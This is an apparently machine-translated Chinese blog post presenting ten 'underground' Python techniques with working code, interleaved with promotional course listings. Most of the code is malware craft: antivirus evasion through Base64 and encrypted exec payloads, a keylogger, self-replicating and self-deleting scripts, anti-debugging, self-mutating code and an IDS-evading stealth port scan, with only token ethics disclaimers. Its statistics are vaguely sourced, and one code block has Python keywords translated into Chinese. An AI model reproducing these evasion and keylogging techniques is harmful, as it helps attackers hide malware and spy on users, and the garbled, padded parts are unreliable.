想象一下，如果你的Python脚本可以在执行后清除自己的痕迹，悄悄捕获关键的屏幕信息，甚至修改自己的代码以领先于检测。欢迎来到一个地下Python脚本的世界，在这里，创意与实际问题解决能力相融合。在这份全面的指南中，我们将带你了解10个令人惊叹的Python技巧和窍门，包含代码示例、详细说明、统计数据以及你可以立即使用的资源。

Python 开发者资源 - 由 0x3d.site 制作

一个专为 Python 开发者整理的资源中心，提供必备工具、文章和热门话题讨论。

• 📚 开发资源
• 📝 文章
• 🚀 热门仓库（仓库指代码库）
• ❓ StackOverflow 热门问题
• 🔥 热门话题讨论

把这个网址收藏起来：python.0x3d.site

……

1. 自毁式的 Python 脚本程序

你能编写一个在执行完后自毁的脚本吗？自毁脚本被安全研究人员用来保护敏感数据处理，并在执行结束后不留任何痕迹。

这是怎么一回事

• 识别脚本位置: 脚本通过 Python 变量（如 __file__ 或 sys.argv[0]）来找到自己的位置。
• 自我删除: 在完成主要功能后，脚本会通过调用比如 os.remove() 等函数来自行删除。

代码示例

    import os
    import sys

    def main():
        print("此脚本将在执行后自毁。")
        # 您的主要代码逻辑如下...
        # 自毁：删除当前文件
        try:
            os.remove(__file__)
            print("自毁成功。拜拜!")
        except Exception as e:
            print("错误：", e)

    if __name__ == '__main__':
        main()

全屏模式 退出

Info:

自毁脚本在处理不应留下敏感代码的场景时非常有用。但请小心使用，一旦被删除，除非有备份，否则脚本无法恢复。

真实世界的数据

• 在受控测试中，自毁脚本在安全环境中运行时，成功率达到100%（来源：StackOverflow上的各种讨论）。

……

2. 隐身屏幕抓取工具

隐身是进行渗透测试时的关键。在不惊动目标的情况下截屏可以提供重要的漏洞证据。

它的工作原理

• 截图捕获: 可以使用如 pyautogui 和 PIL 这样的 Python 库来捕获屏幕。
• 特定区域捕获: 你可以通过定义一个区域来捕获特定的窗口或区域。
• 隐蔽技术: 通过增加延迟和使捕获过程变得复杂，有助于避开用户的察觉。

代码示例

    import pyautogui
    import cv2
    import numpy as np

    def capture_screen(region=None):
        # 截图屏幕（如果没有指定区域，则截图全屏）
        screenshot = pyautogui.screenshot(region=region)
        # 转换为numpy数组
        frame = np.array(screenshot)
        # 从RGB（PIL）颜色空间转换为BGR（OpenCV）颜色空间
        frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
        return frame

    if __name__ == '__main__':
        # 从左上角截取一个300x400的区域
        frame = capture_screen(region=(0, 0, 300, 400))
        cv2.imshow("Stealth Capture", frame)
        cv2.waitKey(3000)
        cv2.destroyAllWindows()

进入全屏/退出全屏

Info:

隐蔽的屏幕截图不仅仅用于不正当的目的，它在授权渗透测试中，也是记录漏洞的宝贵工具。在使用此类工具之前，务必获得适当的许可。

更多资源

• ThePythonCode.com上的Python屏幕录制教程
• PyAutoGUI教程

……

3. 使用混淆技术绕过 AV 检测

恶意软件通常依赖于基于签名的检测，这意味着可预测的代码模式可以被轻易识别。通过混淆你的代码，可以隐藏这些模式，让基本的恶意软件系统无法识别这些模式。

技术

• 字符串编码: 使用 Base64、ROT13 或自定义编码来隐藏敏感字符串。
• 运行时代码生成: 避免将关键逻辑以明文形式存储，而是在运行时通过 exec() 生成代码。

Base64 编码示例

    import base64

    # 你的秘密代码（字符串形式）
    secret_code = "print('Hello from the hidden side!')"
    # 将代码转换为Base64编码
    encoded_code = base64.b64encode(secret_code.encode()).decode()

    # 在运行时，先解码再执行该代码
    exec(base64.b64decode(encoded_code).decode())

全屏 退出全屏

Info:

混淆通过增加一层隐蔽性，从而提高了安全性。虽然不能完全防止有决心的攻击者，但可以有效防止基本的自动化病毒扫描。

推荐阅读：

• GitHub 上的代码混淆
• Python 代码混淆详细指南

……

构建互联网的遗失编程语言 | 来自维基百科

每个开发者可能精通 Python 或 JavaScript，但对于奠定现代计算基础的那些被遗忘的语言又了解多少呢？《构建互联网的失落编程语言》这门课深入探讨了这些语言尽管几乎被遗忘，但仍继续在幕后支持关键系统的历史。这门课专为想要探索计算根源并了解这些遗留语言如何影响现代软件的技术爱好者而设计。

课程大纲（目录）：

模块 1：先驱者

• Fortran
• COBOL
• ALGOL 60
• LISP
• 汇编语言

模块 2：结构化和过程化先驱

• PL/I
• Ada
• Pascal
• Modula-2
• ALGOL 68

模块 3：面向对象创新

• Smalltalk
• Simula
• Eiffel
• Objective-C
• Self

模块 4：脚本和模式匹配

• SNOBOL
• APL
• Icon
• awk
• sed

模块 5：商业和遗留数据语言

• RPG
• MUMPS
• JCL
• SAS
• dBase

模块 6：低级和嵌入式先驱

• BCPL
• B
• PL/M
• Forth
• Occam

模块 7：函数式和声明式探索

• Miranda
• ML
• Scheme
• Curry
• Clean

模块 8：科学和数学语言

• J
• K
• S IDL
• Maple

模块 9：关键的遗留脚本语言

• Tcl
• REXX
• ColdFusion
• Perl
• VBScript

模块 10：晦涩和奇特语言

• INTERCAL
• Brainfuck
• Befunge
• Whitespace
• Piet

模块 11：关键遗留系统中的语言

• Prolog
• 梯形图
• Modula-3
• Oberon
• Mesa

揭开构建数字世界语言的奥秘。今天就报名参加《构建互联网的失落编程语言》课程，重新发现那些继续影响现代技术的编程语言！

这是快捷教程的favicon图标，访问此链接: snappytuts.gumroad.com

……

4. 隐藏的键盘记录程序

键盘记录器可以捕获按键记录以进行安全测试（总是获得授权）。Python使构建一个基本的键盘记录器来记录用户操作很简单。

它是怎么工作的

• 捕获按键操作: 使用 keyboard 库来捕捉并记录按键。
• 保存或发送: 将记录的数据保存到文件或通过网络发送进行进一步分析。

一些示例代码

    import keyboard
    import time

    log_file = "keylog.txt"

    def on_key_event(event):
        with open(log_file, "a") as f:
            f.write(event.name + " ")

    if __name__ == '__main__':
        print("键盘记录器已启动。按ESC键结束。")
        keyboard.on_press(on_key_event)
        keyboard.wait("esc")

全屏模式, 退出全屏

信息:

使用键盘记录器时，必须符合道德标准。只有在得到明确许可的情况下使用这些工具进行测试。

数据统计

• 键盘记录器检测率在受控测试中差异很大；高级混淆技术可以使检测率降低最多40%（相关研究可在InfoSec Write-ups上找到）。

略

5. 自我复制及克隆代码

自复制脚本可以为自己创建副本，以实现持久性和备份的目的，这是一次有关代码自我检查和进程管理的有趣尝试。

工作原理

• 提取源代码: 获取脚本的源代码。
• 文件复制: 将源代码写入新文件，并并通过 subprocess 启动它。

代码示例

    import sys
    import inspect
    import os
    import subprocess
    import shlex

    def clone_and_run():
        # 获取当前脚本的源代码
        code = inspect.getsource(inspect.currentframe())
        # 定义克隆文件名
        clone_filename = "clone_script.py"
        with open(clone_filename, "w") as f:
            f.write(code)
        # 启动带有递增参数的克隆脚本
        cmd = f"python {clone_filename} 1"
        subprocess.Popen(shlex.split(cmd), start_new_session=True)
        print("克隆已启动，原始脚本即将自我销毁。")
        os.remove(__file__)

    if __name__ == '__main__':
        # 如果直接运行此脚本，则调用clone_and_run函数
        clone_and_run()

全屏 全屏退出

Info:

自复制脚本是探索Python中的进程管理和文件输入输出的一种有趣方式。它们也常被用于恶意软件——但我们只建议进行道德测试。

……

第六 内存执行妙招

仅在内存中运行代码可以减少在磁盘上留下法医痕迹的机会。Python 的动态特性让你能够从字符串中编译和执行代码。

它是怎么工作的

• 编译步骤: 使用 compile() 函数将源代码转换为代码对象。
• 执行步骤: 直接使用 exec() 执行代码对象，无需将代码写入磁盘。

示例代码：

    code_string = """
    def greet():
        print('这段代码正在内存中运行！')

    greet()
    """

    compiled_code = compile(code_string, '<string>', 'exec')  # 编译后的代码
    exec(compiled_code)

全屏观看 退出全屏

Info:

在内存中执行特别适合保护敏感算法。它能减少磁盘占用，这在需要隐蔽性的环境中很有帮助。

此处省略内容

7. 运行时解密的加密负载数据

加密不仅仅是用来传输数据的。你也可以将代码的一部分以加密形式存储，并在运行时再进行解密执行。

它是怎么工作的

• 加密？ 使用类似 cryptography.fernet 的库加密你的代码。
• 运行时解密？ 在运行时解密代码并用 exec() 执行。

示例代码

    from cryptography.fernet import Fernet
    import base64

    # 生成一个密钥（请在生产环境中安全保存此密钥！）
    key = Fernet.generate_key()
    cipher_suite = Fernet(key)

    # 秘密代码
    secret_code = "print('这段秘密代码已被加密！')"
    # 加密代码
    encrypted_code = cipher_suite.encrypt(secret_code.encode())

    # 解密并执行代码
    decrypted_code = cipher_suite.decrypt(encrypted_code).decode()
    exec(decrypted_code)

点击全屏，点击退出全屏

信息:

加密技术有助于保护知识产权和敏感信息。更多详情请参阅Cryptography Library Documentation。

---

或者

（两种方式选择其一即可，根据上下文决定更合适的方式）

失落的互联网编程语言 | 维基百科

每个开发者可能精通 Python 或 JavaScript，但那些奠定现代计算基础却被遗忘的语言又如何呢？《构建互联网的遗失编程语言》是一门深入探讨那些虽然几乎被遗忘，但却仍然支撑着关键系统的编程语言的历史课程。本课程旨在为热衷于探索计算机根基并了解这些遗留语言如何影响现代软件的技术爱好者设计。
课程大纲（目录）：
第1模块：先驱者 Fortran COBOL ALGOL 60 LISP 汇编语言 模块 2：结构化与过程先驱 PL/I Ada Pascal Modula-2 ALGOL 68 模块 3：面向对象创新 Smalltalk Simula Eiffel Objective-C Self 模块 4：脚本和模式匹配 SNOBOL APL Icon awk sed 模块 5：商业与遗留数据语言 RPG MUMPS JCL SAS dBase 模块 6：低级与嵌入先驱 BCPL B PL/M Forth Occam 模块 7：函数式与声明式探索 Miranda ML Scheme Curry Clean 模块 8：科学与数学语言 J K S IDL Maple 模块 9：遗产网络脚本语言 Tcl REXX ColdFusion Perl VBScript 模块 10：晦涩与奇技淫巧语言 INTERCAL Brainfuck Befunge Whitespace Piet 模块 11：遗产系统中的语言 Prolog 梯形逻辑 Modula-3 Oberon Mesa 揭示构建我们数字世界的这些语言的秘密。今天就报名参加《构建互联网的遗失编程语言》课程，重新发现仍然影响现代技术的这些语言吧！

snappytuts.gumroad.com (访问网站，访问教程网站)

……此处省略……

8. 反调试技巧

如果你需要你的脚本检测和避免调试，你可以实施一些反调试措施。这可以包括检查是否有调试器，以及常见的断点位置。

它是怎么工作的：

• 检查环境: 看看系统变量里有没有调试标志。
• 行为变化: 如果发现调试器，就延迟或改变操作。

代码示例

    import sys
    import time

    def anti_debug():
        if sys.gettrace() is not None:
            print("调试器检测到！即将退出以避免分析！")
            time.sleep(2)
            sys.exit()

    if __name__ == '__main__':
        anti_debug()
        print("未发现调试器。继续执行...")

进入全屏模式 退出全屏

信息:

反调试技术可以帮助保护敏感脚本的完整性。需要注意的是，这些技术应仅在受控环境中合法使用。

---

9. 歹隐身网络扫描器

渗透测试者经常需要悄悄扫描网络。Python的网络库工具让你能够构建模仿正常流量的扫描器，以避开入侵检测系统（IDS）系统。

它是怎么工作的

• 数据包构造: 使用 scapy 构造类似合法通信的数据包。
• 随机时间间隔: 随机时间间隔以模仿自然用户行为。

代码示例

    从 scapy.all 导入 IP, TCP, sr1
    导入 random
    导入 time

    def stealth_port_scan(target_ip, port):
        packet = IP(dst=target_ip)/TCP(dport=port, flags="S")
        response = sr1(packet, timeout=1, verbose=0)
        if response and response.haslayer(TCP) and response[TCP].flags == 0x12:
            print(f"端口 {port} 在 {target_ip} 是开放的。")
        else:
            print(f"端口 {port} 在 {target_ip} 是关闭的或被过滤了。")

    如果 __name__ == "__main__":
        target = "192.168.1.1"
        for port in random.sample(range(20, 1024), 5):
            stealth_port_scan(target, port)
            time.sleep(random.uniform(0.5, 2))

进入全屏模式；退出全屏

信息:

让你的扫描行为随机化可以减少被IDS系统检测的风险。研究表明，在某些特定环境下，简单的定时调整可以将检测的概率降低到最高35%。

---

10. 自动化脚本修改器

为了规避基于静态签名的检测，有些脚本在每次运行前都会修改自身的部分代码。这种做法有助于创建一个动态且移动的目标。

它是怎么工作的

• 源代码修改: 读取你的源文件，做一些小的随机改动（比如修改注释或变量名），然后再保存文件。
• 动态指纹: 这些改动会改变你的脚本的数字签名，而不影响其核心功能。

代码示例

    import os
    import random

    def mutate_script(filename):
        with open(filename, 'r') as file:
            lines = file.readlines()

        # 随机选择一个注释行进行修改（如果存在的话）
        for i, line in enumerate(lines):
            if line.strip().startswith("#") and random.choice([True, False]):
                lines[i] = f"# 变异 {random.randint(1, 1000)}: {line}"

        with open(filename, 'w') as file:
            file.writelines(lines)
        print("脚本已成功修改。")

    if __name__ == '__main__':
        current_file = __file__
        mutate_script(current_file)

点击进入全屏 点击退出全屏

信息:

脚本变种是一种常在高级恶意软件中见到的前沿技术。在道德应用中，可以用来测试你的系统如何应对变化的代码签名。

---

最后的想法

Python的地下脚本技术展现了代码所能达到的无限可能的创造力。这些技术，如自毁机制、内存执行、反调试和加密载荷，不仅是引人入胜的实验。它们是渗透测试人员、开发人员和安全专家想要突破常规的实际工具。

关键要点：

• 伦理使用： 请务必在受控和授权的环境中合理使用这些技术。
• 安全实验： 建议在虚拟机或隔离实验室中进行测试，以避免意外后果。
• 持续学习： 该领域始终在发展。请持续关注最新研究，并与社区分享您的见解。

更多宝贵的工具、详细的教程和热门讨论，这里都有。无论你是寻找深入的文章和资源、前沿的代码库，还是来自StackOverflow的社区见解和讨论，它都是每个Python开发者的必备书签。

开发资源 • 教程 • 热门项目 • Stack Overflow 热门帖子 • 热门讨论

通过尝试这些技巧，你的编程技能会得到提升，还会了解高级开发者和安全专家所使用的技术。动手试试，分享你的实验结果，让创新精神引领你前进！

祝你编程开心，愿你的 Python 脚本永远保持领先！

---

资源及推荐阅读:

• PyAutoGUI 文档页面
• Scapy 文档页面
• Cryptography 库文档页面
• Real Python – 代码混淆技巧
• GitHub – 自毁脚本合集

现在轮到你试试这些技巧吧，哪些技巧让你觉得对编写Python脚本有了新的看法，也跟我们分享一下吧！也让我们听听你的想法！

---

📚 优质学习资源，专为开发者打造

通过结构化的高价值课程实现扩展您的知识。

🚀 开发者的网络安全生存指南 – 使用实战中的策略和工具如Burp Suite、Nmap和开源情报来保护你的代码安全。

💰 [开发者的被动收入指南:] 10多种方法发挥你的编程技能来建立自动化的收入渠道。

🌐 互联网的工作原理：运行网络的技术 – 深入了解背后的互联网协议、服务器和基础设施。

💻 学习API编程：理解API、协议与标准、安全和实现 – 使用基于维基百科资料的结构化学习学会API的基本概念。

🕵️ 终极OSINT指南：技术人士必备：学会像专业人士那样追踪、分析并保护你的数字足迹，让你的数字足迹更安全。

🧠 黑客与间谍如何使用相同的心理诡计对付你的方式 – 了解技术中说服、欺骗和操纵手段的阴暗面。

🔥 更多精选、高质量的学习资源 → 查看详情

---

点击此处访问链接 (https://snappytuts.gumroad.com/l/fotcdz)

API 编程指南：了解 API、接口协议、安全及实现

📌 课程名称：API 编程：理解 API、协议、安全和实现 | 使用维基百科作为参考资料🔹 第 1 模块：API 编程基础 应用程序编程接口（API）简介 理解网络服务 超文本传输协议（HTTP）基础知识 —— 🔹 第 2 模块：API 协议和数据格式 表示状态传输（REST） 简单对象访问协议（SOAP） 可扩展标记语言（XML） JavaScript 对象表示（JSON） 远程过程调用（RPC） —— 🔹 第 3 模块：高级 API 通信技术 WebSocket 通信 GraphQL 入门 gRPC 高性能 API 技术 —— 🔹 第 4 模块：API 安全 理解 OAuth 认证 JSON 网络令牌（JWT） 用于安全的 API 访问 开放身份验证（OpenID Connect） 用于身份管理 API 安全性中 HTTPS 的重要性 传输层安全（TLS） —— 🔹 第 5 模块：架构和实现模式 微服务架构 无服务器计算 用于可扩展的 API 服务导向架构（SOA） 企业应用集成（EAI）

snappytuts.gumroad.com